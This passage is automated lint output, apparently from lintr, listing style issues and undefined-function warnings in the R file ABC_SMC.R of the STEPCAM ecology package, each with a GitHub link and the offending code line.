Fit_Even <- (abs((even - obs[,2])) / sd_vals[2])^2;\n                                ^\n```\n[R/ABC_SMC.R:73:51:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L73) *style:* **Put spaces around all infix operators.**\n```r\n​  Fit_Even <- (abs((even - obs[,2])) / sd_vals[2])^2;\n                                                 ~^~\n```\n[R/ABC_SMC.R:74:20:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L74) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  Fit_Div  <- (abs((div -  obs[,3])) / sd_vals[3])^2;\n                   ^\n```\n[R/ABC_SMC.R:74:33:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L74) *style:* **Commas should always have a space after.**\n```r\n​  Fit_Div  <- (abs((div -  obs[,3])) / sd_vals[3])^2;\n                                ^\n```\n[R/ABC_SMC.R:74:51:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L74) *style:* **Put spaces around all infix operators.**\n```r\n​  Fit_Div  <- (abs((div -  obs[,3])) / sd_vals[3])^2;\n                                                 ~^~\n```\n[R/ABC_SMC.R:75:40:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L75) *style:* **Put spaces around all infix operators.**\n```r\n​  Fit_optima <- (opt_diff / sd_vals[4])^2;\n                                      ~^~\n```\n[R/ABC_SMC.R:83:21:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L83) *style:* **Variable and function names should be all lowercase.**\n```r\n​ABC_SMC <- function(numParticles, species_fallout, taxa, esppres, n_traits,\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:85:46:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L85) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    abundances, frequencies, stopRate, Ord)  {\n                                             ^~~~~~~~\n```\n[R/ABC_SMC.R:88:3:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L88) *style:* **Variable and function names should be all lowercase.**\n```r\n​  dispVals <- 1:numParticles\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:88:17:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L88) *style:* **Variable and function names should be all lowercase.**\n```r\n​  dispVals <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:89:3:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L89) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filtVals <- 1:numParticles\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:89:17:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L89) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filtVals <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:90:3:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L90) *style:* **Variable and function names should be all lowercase.**\n```r\n​  compVals <- 1:numParticles\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:90:17:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L90) *style:* **Variable and function names should be all lowercase.**\n```r\n​  compVals <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:92:13:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L92) *style:* **Variable and function names should be all lowercase.**\n```r\n​  fits <- 1:numParticles\n            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:93:3:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L93) *style:* **Variable and function names should be all lowercase.**\n```r\n​  RichVec <- 1:numParticles\n  ^~~~~~~\n```\n[R/ABC_SMC.R:93:16:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L93) *style:* **Variable and function names should be all lowercase.**\n```r\n​  RichVec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:94:3:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L94) *style:* **Variable and function names should be all lowercase.**\n```r\n​  EveVec <- 1:numParticles\n  ^~~~~~\n```\n[R/ABC_SMC.R:94:15:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L94) *style:* **Variable and function names should be all lowercase.**\n```r\n​  EveVec <- 1:numParticles\n              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:95:3:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L95) *style:* **Variable and function names should be all lowercase.**\n```r\n​  DivVec <- 1:numParticles\n  ^~~~~~\n```\n[R/ABC_SMC.R:95:15:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L95) *style:* **Variable and function names should be all lowercase.**\n```r\n​  DivVec <- 1:numParticles\n              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:96:3:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L96) *style:* **Variable and function names should be all lowercase.**\n```r\n​  OptVec <- 1:numParticles\n  ^~~~~~\n```\n[R/ABC_SMC.R:96:15:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L96) *style:* **Variable and function names should be all lowercase.**\n```r\n​  OptVec <- 1:numParticles\n              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:98:3:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextDisp <- dispVals\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:98:15:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextDisp <- dispVals\n              ^~~~~~~~\n```\n[R/ABC_SMC.R:99:3:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L99) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextFilt <- filtVals\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:99:15:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L99) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextFilt <- filtVals\n              ^~~~~~~~\n```\n[R/ABC_SMC.R:100:3:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L100) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextComp <- compVals\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:100:15:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L100) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextComp <- compVals\n              ^~~~~~~~\n```\n[R/ABC_SMC.R:102:21:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L102) *style:* **Variable and function names should be all lowercase.**\n```r\n​  weights <- rep(1, numParticles)\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:103:3:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L103) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextWeights <- rep(1, numParticles)\n  ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:103:25:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L103) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextWeights <- rep(1, numParticles)\n                        ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:104:16:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L104) *style:* **Variable and function names should be all lowercase.**\n```r\n​  indices <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:110:6:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L110) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​   if(length(f) > 0)\n     ^\n```\n[R/ABC_SMC.R:111:3:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L111) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​  {\n  ^\n```\n[R/ABC_SMC.R:117:5:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L117) *style:* **Variable and function names should be all lowercase.**\n```r\n​    dispVals <- d[,1]\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:117:20:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L117) *style:* **Commas should always have a space after.**\n```r\n​    dispVals <- d[,1]\n                   ^\n```\n[R/ABC_SMC.R:118:5:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L118) *style:* **Variable and function names should be all lowercase.**\n```r\n​    filtVals <- d[,2]\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:118:20:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L118) *style:* **Commas should always have a space after.**\n```r\n​    filtVals <- d[,2]\n                   ^\n```\n[R/ABC_SMC.R:119:5:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L119) *style:* **Variable and function names should be all lowercase.**\n```r\n​    compVals <- d[,3]\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:119:20:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L119) *style:* **Commas should always have a space after.**\n```r\n​    compVals <- d[,3]\n                   ^\n```\n[R/ABC_SMC.R:120:20:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L120) *style:* **Commas should always have a space after.**\n```r\n​    fits <-     d[,8]\n                   ^\n```\n[R/ABC_SMC.R:121:20:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L121) *style:* **Commas should always have a space after.**\n```r\n​    weights <-  d[,9]\n                   ^\n```\n[R/ABC_SMC.R:124:11:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L124) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (d[numParticles,1] == numParticles)\n          ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:124:24:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L124) *style:* **Commas should always have a space after.**\n```r\n​    if (d[numParticles,1] == numParticles)\n                       ^\n```\n[R/ABC_SMC.R:124:30:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L124) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (d[numParticles,1] == numParticles)\n                             ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:125:5:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L125) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​    {\n    ^\n```\n[R/ABC_SMC.R:126:35:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L126) *style:* **Put spaces around all infix operators.**\n```r\n​      d <- read.table( f[length(f)-1], header = F);\n                                 ~^~\n```\n[R/ABC_SMC.R:127:31:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L127) *style:* **Commas should always have a space after.**\n```r\n​      output <- list( DA = d[,1], HF = d[,2], LS = d[,3]);\n                              ^\n```\n[R/ABC_SMC.R:127:43:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L127) *style:* **Commas should always have a space after.**\n```r\n​      output <- list( DA = d[,1], HF = d[,2], LS = d[,3]);\n                                          ^\n```\n[R/ABC_SMC.R:127:55:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L127) *style:* **Commas should always have a space after.**\n```r\n​      output <- list( DA = d[,1], HF = d[,2], LS = d[,3]);\n                                                      ^\n```\n[R/ABC_SMC.R:136:3:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L136) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​  {\n  ^\n```\n[R/ABC_SMC.R:144:5:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L144) *style:* **Variable and function names should be all lowercase.**\n```r\n​    numberAccepted <- 0\n    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:145:1:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L145) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      if ((numberAccepted)%%(numParticles / PRINT_FREQ) == 0) {\n^\n```\n[R/ABC_SMC.R:145:28:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L145) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:145:28:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L145) *warning:* **no visible global function definition for ‘normalizeWeights’**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:153:12:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L153) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted < numParticles) {\n           ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:153:29:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L153) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted < numParticles) {\n                            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:157:19:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L157) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:157:19:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L157) *warning:* **no visible global function definition for ‘getRandomVals’**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:159:1:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L159) *style:* **lines should not be more than 80 characters.**\n```r\n​        params <- getFromPrevious(indices, weights, dispVals, filtVals, compVals)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:159:19:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L159) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights, dispVals, filtVals, compVals)\n                  ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:159:19:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L159) *warning:* **no visible global function definition for ‘getFromPrevious’**\n```r\n​        params <- getFromPrevious(indices, weights, dispVals, filtVals, compVals)\n                  ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:159:53:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L159) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights, dispVals, filtVals, compVals)\n                                                    ^~~~~~~~\n```\n[R/ABC_SMC.R:159:63:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L159) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights, dispVals, filtVals, compVals)\n                                                              ^~~~~~~~\n```\n[R/ABC_SMC.R:159:73:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L159) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights, dispVals, filtVals, compVals)\n                                                                        ^~~~~~~~\n```\n[R/ABC_SMC.R:160:19:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L160) *warning:* **no visible global function definition for ‘perturb’**\n```r\n​        params <- perturb(params, sigma)\n                  ^~~~~~~\n```\n[R/ABC_SMC.R:167:11:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L167) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if( sum(params) > species_fallout) {\n          ^\n```\n[R/ABC_SMC.R:179:1:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L179) *style:* **lines should not be more than 80 characters.**\n```r\n​      # and community ((66 * permutations * communities) x total species richness) matrices\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:180:1:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L180) *style:* **lines should not be more than 80 characters.**\n```r\n​      traits <- as.data.frame(species[, c(2:(n_traits + 1))], row.names = c(1:taxa))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:184:1:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L184) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  d <- read.table(paste(\"particles_t=\", t - 2, \".txt\", sep=\"\",\n^\n```\n[R/ABC_SMC.R:185:1:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L185) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                        collapse = NULL), header = F)\n^\n```\n[R/ABC_SMC.R:186:1:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L186) *style:* **lines should not be more than 80 characters.**\n```r\n​     # FD_output <- dbFD(traits[present_species, ], communities[, present_species], stand.x = F,messages=FALSE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:186:8:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L186) *style:* **Commented code should be removed.**\n```r\n​     # FD_output <- dbFD(traits[present_species, ], communities[, present_species], stand.x = F,messages=FALSE)\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:187:20:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L187) *style:* **Variable and function names should be all lowercase.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[,present_species])\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:187:20:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L187) *warning:* **no visible global function definition for ‘strippedDbFd’**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[,present_species])\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:187:51:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L187) *style:* **Commas should always have a space after.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[,present_species])\n                                                  ^\n```\n[R/ABC_SMC.R:188:1:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L188) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  d <- read.table(paste(\"particles_t=\", t - 1, \".txt\", sep=\"\",\n^~\n```\n[R/ABC_SMC.R:188:1:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L188) *style:* **lines should not be more than 80 characters.**\n```r\n​      FRic <- FD_output$FRic # FRic = functional richness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:189:1:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L189) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t                        collapse = NULL), header = F)\n^~\n```\n[R/ABC_SMC.R:189:1:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L189) *style:* **lines should not be more than 80 characters.**\n```r\n​      FEve <- FD_output$FEve # FEve = functional evenness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:190:1:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L190) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  } else {\n^\n```\n[R/ABC_SMC.R:190:1:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L190) *style:* **lines should not be more than 80 characters.**\n```r\n​      FDiv <- FD_output$FDiv # FDiv = functional diversity (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:191:1:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L191) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  d <- read.table(paste(\"particles_t=\", t, \".txt\", sep=\"\",\n^~\n```\n[R/ABC_SMC.R:192:1:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L192) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t                        collapse = NULL), header = F)\n^~\n```\n[R/ABC_SMC.R:193:1:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L193) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  }\n^\n```\n[R/ABC_SMC.R:199:1:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L199) *style:* **lines should not be more than 80 characters.**\n```r\n​      # calculate distance of trait mean simulated community from that of observed\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:202:1:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L202) *style:* **lines should not be more than 80 characters.**\n```r\n​      # (inverse) fit of model: euclidian distance of FD and trait mean values of\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:204:1:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L204) *style:* **lines should not be more than 80 characters.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]], mean_optimum[1], summary_stats, sd_vals)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:204:14:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L204) *style:* **Variable and function names should be all lowercase.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]], mean_optimum[1], summary_stats, sd_vals)\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:204:14:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L204) *warning:* **no visible global function definition for ‘calculateDistance’**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]], mean_optimum[1], summary_stats, sd_vals)\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:208:9:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L208) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:208:27:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L208) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n                          ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:9:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L209) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextDisp[numberAccepted] = params[1]\n        ^~~~~~~~\n```\n[R/ABC_SMC.R:209:18:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L209) *style:* **Variable and function names should be all 